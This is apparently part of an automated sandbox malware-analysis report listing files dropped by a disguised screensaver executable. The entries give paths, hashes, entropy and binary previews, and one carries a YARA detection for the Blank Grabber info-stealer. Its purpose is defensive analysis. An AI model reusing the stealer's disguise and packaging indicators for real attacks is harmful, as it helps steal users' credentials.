Preview:	PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	109438
Entropy (8bit):	7.712242620477564
Encrypted:	false
SSDEEP:	3072:R++YkaNdiyzAWb4rgwFTF6iL5pbkwPuNKHvY:7G4rhtbk5NKHvY
MD5:	0E25A99CD43173252C97103893DC27E2
SHA1:	225196581521723F189DB0D8EABD9B07E9985D9F
SHA-256:	D087BB7C85832990ED37DF305FEF0F5B2325BF775754C8A4BC3F523B32020971
SHA-512:	1FF57D7A0FD8CDA8EBCCDA69E053A3E533E6B9028D1FCAB6FC35C6596C0DB6BC7D12DD37028F0B36997711FD546E757012A4E02DAD00A391399ED72A875CA29C
Malicious:	false
Preview:	PK...........W...............stub-o.pyc.........2.e.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1629464
Entropy (8bit):	7.952620301087112
Encrypted:	false
SSDEEP:	49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5:	27515B5BB912701ABB4DFAD186B1DA1F
SHA1:	3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256:	FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512:	087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.930038440560372
Encrypted:	false
SSDEEP:	3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:	6EDA5A055B164E5E798429DCD94F5B88
SHA1:	2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:	377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:	74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1838360
Entropy (8bit):	7.993871777145928
Encrypted:	true
SSDEEP:	49152:V3Qjrdlkflw6XCRrGhxicF75ShbujR/3z/x:V3Akflw6krEFwujx/x
MD5:	2F1072DDD9A88629205E7434ED055B3E
SHA1:	20DA3188DABE3D5FA33B46BFE671E713E6FA3056
SHA-256:	D086257A6B36047F35202266C8EB8C1225163BD96B064D31B80F0DBE13DA2ACF
SHA-512:	D8DDDC30733811ED9A9C4AE83AC8F3FC4D8BA3FA8051D95242FBD432FD5BF24122373AC5EEA9FEC78F0DAF7C1133365F519A13CF3F105636DA74820A00A25E9B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e..e..e.d..e....e.`..e.a..e.f..e....e..d..e..d...e.Bh.r.e.Be..e.B...e.Bg..e.Rich..e.................PE..d....Are.........." ...%..........Q...l...Q...................................m...........`.........................................H.l.d.....l.......l.......`..Y...........\|m. ............................l.(.....l.@...........................................UPX0......Q.............................UPX1..........Q.....................@....rsrc.........l.....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.4421662383861555
Encrypted:	false
SSDEEP:	768:iBzQ8aVMpJjRIpQGYY5YiSyvkrUAMxkErl:2M5VOjRIpQGYq7SyMryxHl
MD5:	79BB09417365E9B66C8FB984CBB99950
SHA1:	517522DBCBEFB65E37E309CB06FED86C5F946D79
SHA-256:	94F2BAC05E32CB3791F66EFB3229C932AB71BC3725A417340304219721B0D50D
SHA-512:	1C2129DD4D8FEBE2886E122868956BA6032A03B1297DA095D3E9C02AB33183D964A8F790086E688B0720AB39AA1E8D0FE91FADBBE99035BAF4D7CC5754DE9E64
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d....Are.........." ...%.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	645912
Entropy (8bit):	7.993663369194321
Encrypted:	true
SSDEEP:	12288:71Mao81K77fa+Biph8HGq570OuKcmX1SkHCZO1P5JcLpZBwhfitIKJXQ:6h81KHaHpQGM0Ounm49O1PQBq6SKJXQ
MD5:	5655F540DA3E3BD91402E5E5B09A6D2F
SHA1:	D44DB47026B330D06FA84128FD9F0241F5752011
SHA-256:	AA05807DFA35D6FBE1484728110430802A791F3F8723F824696F2D6BD9C5B69A
SHA-512:	1205DCD5657DCC457F8D02452C47FCB2E7FEE108A675AADDC9F7B82D1F2371E38080A6FA0F767524F835C544F129B6F71B2D716180D196B18A9A6DBEF6C9BF03
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d....Bre.........." ...%.....0......0........................................`............`..........................................;..."...8.......0.......................]......................................@'..@...........................................UPX0....................................UPX1.............z..................@....rsrc....0...0.......~..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1017720
Entropy (8bit):	6.638795525512885
Encrypted:	false
SSDEEP:	24576:ZLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+o:dyubJvlhrVETiR+o
MD5:	9679F79D724BCDBD3338824FFE8B00C7
SHA1:	5DED91CC6E3346F689D079594CF3A9BF1200BD61
SHA-256:	962C50AFCB9FBFD0B833E0D2D7C2BA5CB35CD339ECF1C33DDFB349253FF95F36
SHA-512:	74AC8DEB4A30F623AF1E90E594D66FE28A1F86A11519C542C2BAD44E556B2C5E03D41842F34F127F8F7F7CB217A6F357604CB2DC6AA5EDC5CBA8B83673D8B8BD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc.>0.>0.>0#..0..>0.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6....................................................`A........................................ ...........................H....d..x#......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302360
Entropy (8bit):	7.988149972534172
Encrypted:	false
SSDEEP:	6144:CtrmB1o+h9g+j16hJQ8BTAXVSjMrybczs6mNqIHf96eVc4P7u/:4qB15h91j12i8xAXVSjM+b3z/0e+O7u/
MD5:	20F206B5B405D837C201B8FB443CFA5A
SHA1:	F06B062505F7218D49A1EF0EA65C6212DC4105B0
SHA-256:	0AE76F7316506BCAA4A59F31817569129FD1BAAABA89032953785DBF9F7A7242
SHA-512:	B36E4AF96BEF6B8C13D509B66C34F1CDF6AC8830267FABC13A811D7D486D938D798B32B4D195FEA762EE550501002674D6681F8985318990B454A5BC5C982088
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d....Are.........." ...%.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ric4va3.zfn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kckqprz.iaa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sbbme0r.vlf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x1or3kc.dz1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ycgcdox.5ji.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kwun0or.kqx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arfxlphr.jtx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cehndozn.1kt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evf4zszv.cxz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsj2c4gj.xvf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gaxjbgjc.1d5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vnjgc0.mf2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpvl03jk.qtf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofim2axs.cug.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbntxrea.jqh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1whz1zs.vmd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
